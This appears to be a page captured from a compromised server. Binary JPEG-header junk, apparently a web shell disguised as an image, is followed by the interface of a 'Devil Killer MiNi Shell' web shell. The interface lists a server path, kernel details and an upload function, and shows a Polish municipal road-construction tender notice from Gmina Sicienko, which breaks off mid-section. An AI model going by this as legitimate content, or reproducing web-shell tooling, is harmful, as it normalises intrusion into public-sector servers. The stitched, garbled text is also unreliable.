JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250218/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250218/0010899601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa drogi gminnej 050323C ul. Spokojna i 050361C ul. Gwarna w Osówcu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA SICIENKO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092350694</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mrotecka</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sicienko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-014</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">523117432</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@sicienko.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.sicienko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa drogi gminnej 050323C ul. Spokojna i 050361C ul. Gwarna w Osówcu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6342bea1-3fef-4a48-bb8e-c1a9dc039e8c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00108996</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00072606/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Rozbudowa drogi gminnej ul. Spokojna i Gwarna w Osówcu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/sicienko <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/sicienko</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wniosków <br/>o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344). <br/>2.	Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w rozdz. XII pkt 8 SWZ składa się, <br/>pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/>3.	Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują elektronicznie za pomocą platformazakupowa.pl (dalej jako „Platforma”), dostępną pod adresem: https://platformazakupowa.pl/pn/sicienko i formularza „Wyślij wiadomość do zamawiającego” dostępnego na stronie dotyczącej danego postepowania (nie dotyczy składania ofert).<br/>4.	W sytuacjach awaryjnych np. w przypadku niedziałania Platformy, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres: zamówienia.publiczne@sicienko.pl (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem Danych Osobowych przetwarzanych w Urzędzie Gminy w Sicienku, ul. Mrotecka 9, <br/>86-014 Sicienko jest Wójt Gminy Sicienko. Z Administratorem można skontaktować się osobiście w jego siedzibie, poprzez adres poczty elektronicznej gmina@sicienko.pl lub pisemnie pod adresem Urzędu Gminy w Sicienku, ul. Mrotecka 9, 86-014 Sicienko. Z naszym Inspektorem Ochrony Danych Krzysztofem Dziemian, można skontaktować się przy pomocy adresu e-mail iod@rodo.pl.<br/>Cel przetwarzania:<br/>Państwa dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie przedmiotowego zamówienia publicznego i ewentualnego zawarcia umowy w sprawie przedmiotowego zamówienia publicznego, w razie wyboru Państwa oferty jako najkorzystniejszej, na podstawie art. 6 ust. 1 lit. b i c RODO;<br/>Podanie przez Państwa danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy <br/>z dnia 11 września 2019 roku Prawo zamówień publicznych (Dz.U. z 2023 r., poz. 1605 ze zm.) (ustawa Pzp), związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>Okres przechowywania danych:<br/>Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia. W przypadku zawarcia umowy i jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>Prawa związane z przetwarzaniem danych osobowych:<br/>Przysługuje Państwu<br/>•	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>•	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>•	na podstawie art. 18 RODO prawo żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>•	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, <br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>Nie przysługuje Państwu:<br/>•	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>•	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Odbiorcy danych:<br/>•	osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp;<br/>•	właściwe podmioty administracji publicznej i samorządowej w zakresie i w celach, które wynikają <br/>z przepisów powszechnie obowiązującego prawa.<br/>•	firmy świadczące usługi na rzecz Administratora, a w szczególności w zakresie: ochrony danych osobowych, podmiotom wykonującym usługi audytu, obsługi informatycznej, oprogramowania komputerowego;<br/>•	inne podmioty, które na podstawie stosownych umów przetwarzają dane osobowe dla Administratora.<br/><br/>Państwa dane nie będą przetwarzane w sposób zautomatyzowany w tym również w formie profilowania. Państwa dane nie są przetwarzane poza obszarem EOG.  <br/><br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">271.13.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres robót obejmuje wykonanie robot budowlanych w zakresie opisanym w dokumentacji projektowej, która stanowi załącznik nr 6 do SWZ w tym:<br/>1)	branża drogowa - wykonanie rozbudowy drogi gminnej 050323C, ul Spokojna od km 0+008 <br/>do km 0+652,52 oraz drogi gminnej 050361C, ul. Gwarna od km 0+003 do km 0+305,63 w miejscowości Osówiec, gmina Sicienko, województwo Kujawsko-Pomorskie. Klasa techniczna drogi D, ruch kategorii KR1. Zamówienie obejmuje wykonanie pieszo jezdni o szerokości 5,00 m, o nawierzchni z brukowej kostki betonowej, spadki poprzeczne jezdni zmienne na różnych odcinkach drogi (szczegółowo określone w dokumentacji technicznej). Po obu stronach jezdni na każdej z ulic należy zastosować krawężnik obniżony do 4 cm. Przy każdej z ulic, w miejscach określonych w dokumentacji technicznej należy wykonać zatoki postojowe o wymiarach i spadkach poprzecznych określonych w dokumentacji technicznej oraz obramowane krawężnikiem obniżonym do 4 cm. W tym zakresie:<br/>a)	jezdnię należy wykonać z brukowej kostki betonowej. Zaprojektowana konstrukcja jezdni, jest konstrukcją rozbieralną składającą się z następujących warstw:<br/>-	8 cm nawierzchnia z brukowej kostki betonowej szarej,<br/>-	3 cm podsypka cementowo – piaskowa 1 : 4,<br/>-	20 cm podbudowa z mieszanki kruszywa niezwiązanego 0/31,5 mm, C90/3 ,<br/>- obramowanie jezdni krawężnikiem betonowym wg rysunku 03.11 zawartym w dokumentacji technicznej.<br/>W przypadku natrafienia w podłożu na grunty nienośne, należy podłoże ulepszyć warstwą mrozoochronną <br/>b)	konstrukcja zatok postojowych jest konstrukcją rozbieralną składającą się z następujących warstw:<br/>-	8 cm nawierzchnia z brukowej kostki betonowej szarej,<br/>- 3 cm podsypka cementowo – piaskowa 1 : 4,<br/>- 20 cm podbudowa z mieszanki kruszywa niezwiązanego 0/31,5 mm, C90/3 ,<br/>-	obramowanie zatok postojowych krawężnikiem betonowym wg rysunku 03.11 zawartym w dokumentacji <br/> technicznej.<br/>c)	konstrukcja zjazdów jest konstrukcją rozbieralną składającą się z następujących warstw:<br/>-	8 cm nawierzchnia z brukowej kostki betonowej grafitowej,<br/>-	3 cm podsypka cementowo – piaskowa 1 : 4,<br/>-	20 cm podbudowa z mieszanki kruszywa niezwiązanego 0/31,5 mm, C90/3 ,<br/>-	obramowanie zjazdów krawężnikiem betonowym wg rysunku 03.16 zawartym w dokumentacji <br/> technicznej,<br/>d)	konstrukcja zjazdu do zbiornika retencyjno odparowującego, jest konstrukcją rozbieralną składającą się <br/>z następujących warstw:<br/>-	20 cm podbudowa z mieszanki kruszywa niezwiązanego 0/31,5 mm, C90/3 ,<br/>-	obramowanie zjazdów krawężnikiem betonowym wg rysunku 03.16 zawartym w dokumentacji <br/> technicznej,<br/>e)	wykonanie chodnika, który został zaprojektowany jako dojście do furtek o następującej konstrukcji:<br/>-	8 cm nawierzchnia z brukowej kostki betonowej szarej,<br/>-	3 cm podsypka cementowo – piaskowa 1 : 4,<br/>-	20 cm podbudowa z mieszanki kruszywa niezwiązanego 0/31,5 mm, C90/3 ,<br/>-	obramowanie chodnika obrzeżem betonowym 8*30 wg rysunków 03.15 i 03.14 zawartymi <br/> w dokumentacji technicznej,<br/>f)	pobocza – należy wykonać pobocza o grubości 31 cm z mieszanki kruszywa niezwiązanego 0/31,5 mm, C90/3 ,<br/>g)	skarpy należy wykonać i umocnić przez humusowanie grubości 10 cm z obsianiem trawą,<br/>h)	progi zwalniające – w nowo wybudowanej nawierzchni należy wykonać progi wyspowe o następującej konstrukcji:<br/>-	8 cm nawierzchnia z brukowej kostki betonowej czerwonej,<br/>-	3 cm podsypka cementowo – piaskowa 1 : 4,<br/>-	20 cm podbudowa z mieszanki kruszywa niezwiązanego 0/31,5 mm, C90/3 ,<br/>i)	odwodnienie – na ulicach objętych zamówieniem do odprowadzenia wody z jezdni należy wykonać kanalizację deszczową opisaną w pkt 2) poniżej,<br/>j)	roboty rozbiórkowe należy wykonać wg zakresu szczegółowo opisanego w dokumentacji technicznej. Zamówienie obejmuje także karczowanie pni po wycince lasu w ilości 267 szt. oraz oczyszczenie terenu po wycince lasu na powierzchni 0,3006 ha,<br/>k)	w ramach robót przygotowawczych wykonawca zobowiązany jest do usunięcia krzewów i odrostów <br/>z całego pasa drogowego,<br/>l)	urządzenia obce – przed przystąpieniem do robót wykonawca zobowiązany jest zapoznać się <br/>z lokalizacją urządzeń obcych i zgłosić rozpoczęcie robót administratorom tych urządzeń zgodnie <br/>z zapisami w uzgodnieniach. Wszystkie (ewentualne) inne urządzenia obce napotkane na etapie wykonawstwa należy uzgodnić dodatkowo z ich użytkownikami. Wszystkie roboty w pobliżu urządzeń obcych, należy wykonać ręcznie z zachowaniem należytej ostrożności i pod nadzorem osób administrujących tymi urządzeniami. Należy wykonać regulację/przebudowę urządzeń obcych <br/>do projektowanej niwelety. Hydranty należy zamienić na podziemne lub przebudować poza jezdnię. <br/>W miejscach wskazanych w uzgodnieniach istniejące sieci należy zabezpieczyć grubościenną dwudzielną rurą osłonową,<br/>ł) na wykonawcy spoczywa obowiązek wykonania nowego oznakowania pionowego i poziomego zgodnie <br/> z projektem stałej organizacji ruchu.<br/>2)	kanalizacja deszczowa – zamówienie obejmuje wykonanie systemu kanalizacji deszczowej <br/>do odprowadzenia wód deszczowych i roztopowych. W skład systemu wchodzą:<br/>a)	wpusty deszczowe z osadnikiem – należy wykonać wpusty uliczne betonowe DN500 z osadnikiem, wyposażone w kratę uliczną żeliwną 400 x 600 klasy D400,<br/>b)	studnie kanalizacyjne – należy wykonać studnie kanalizacyjne rewizyjne z kręgów żelbetowych DN1200 łączonych na uszczelkę gumową oraz studnie PEHD 600 mm. Studnie należy wyposażyć we włazy <br/>DN600 mm, klasy D400. Pokrywy studzienne zlokalizowane w drogach należy posadowić na pierścieniach odciążających. Dla zapewnienia szczelności przejść przez ściany studzienek, należy stosować tuleje ochronne z uszczelką montowaną w trakcie prefabrykacji elementów. Studnie rewizyjne w drogach nieutwardzonych należy obrukować w promieniu 0,75 m.<br/>c)	separator z osadnikiem – należy wykonać separator lamelowy z osadnikiem o następującej charakterystyce:<br/>-	przepustowość nominalna 15 dm3 /s,<br/>- przepustowość maksymalna 150 dm3 /s,<br/>- średnica wewnętrzna 2500 mm,<br/>- średnica rur 400 mm,<br/>- pojemność magazynowania oleju min. 300 dm3 ,<br/>- pojemność części osadowej min. 3030 dm3 ,<br/>d)	kolektory deszczowe PVC – kolektory zbiorcze grawitacyjne należy wykonać z rur kanalizacyjnych <br/>PVC-U, klasa sztywności SN=8 kN/m2 o średnicy od 200 do 400 mm o ściance litej klasy SDR34, kielichowych łączonych na uszczelkę elastomerową – wargową,<br/>e)	wylot betonowy – monolityczny wylewany na mokro z betonu B30 W8, F250. Elementy betonowe stykające się z gruntem należy izolować bitumicznie. Po wykonaniu izolacji wylot należy obsypać pospółką zagęszczaną warstwami. Wylot kanalizacji deszczowej należy zabezpieczyć klapą zwrotną.<br/>Parametry wylotu:<br/>- długość - 1170 mm,<br/>- szerokość - 880 mm,<br/>- wysokość	- 1280 mm,<br/>f)	zbiornik retencyjno - odparowujący zlokalizowany będzie na działce nr 142/4:<br/>- przekrój trapezowy,<br/>- długość 35,0 x 12,0 m<br/>- szerokość dna 7,0 x 30,0 m<br/>- szerokość korony 12,0 m,<br/>- głębokość 3,85 – 3,65 m,<br/>- głębokość wypełnienia wodą – zależna od warunków klimatycznych, hmax = 1,3 m.<br/>Wokół zbiornika należy wykonać ogrodzenie panelowe z bramą wjazdową dwuskrzydłową <br/>o szerokości 4m.<br/>3)	oświetlenie drogowe – należy dokonać rozbudowę istniejącego oświetlenia drogowego w następującym zakresie:<br/>a)	budowę linii kablowej YAKY 4x35mm2 , którą należy wyprowadzić z istniejących latarni drogowych <br/>na ul. Gwarnej i Spokojnej do projektowanych słupów,<br/>b)	budowę słupów oświetleniowych stalowych ocynkowanych lub aluminiowych o wysokości h=7m <br/>i grubości ścianki min. 4mm. Słupy należy oznaczyć paskiem koloru zielonego - 3 szt.,<br/>c)	na słupach na wysięgniku o długości 1 m należy zamontować oprawy LED o mocy nie większej niż 51 W i strumieniu świetlnym nie mniejszym niż 7550 lm, temperatura barwowa 4000 K, oprawa musi mieć wbudowany reduktor mocy (obniżenie mocy o 50% w godz. Od 23:00 do 5:00) – 3 kpl.<br/>4)	zabezpieczenie i przebudowa istniejącej sieci teletechnicznej – w związku z rozbudową dróg będących przedmiotem zamówienia istniejącą sieć teletechniczną kolidującą z zaprojektowanym układem drogowym należy zabezpieczyć i rozbudować w następującym zakresie:<br/>a)	budowa studni kablowych SK-1	- 7 szt.,<br/>b)	zabezpieczenie istniejących sieci telekomunikacyjnych rurami osłonowymi – 0,073 km,<br/>c)	przebudowa istniejących kabli ziemnych (długość wykopu)	- 0,186 km,<br/>d)	przebudowa istniejących słupków kablowych - 5 szt.<br/>Przed przystąpieniem do prac należy szczegółowo zapoznać się z usytuowaniem istniejących urządzeń oraz zaleceniami do uzgodnień. Całość prac w tym zakresie należy prowadzić pod nadzorem użytkownikach tych urządzeń. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45232452-5 - Roboty odwadniające</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie 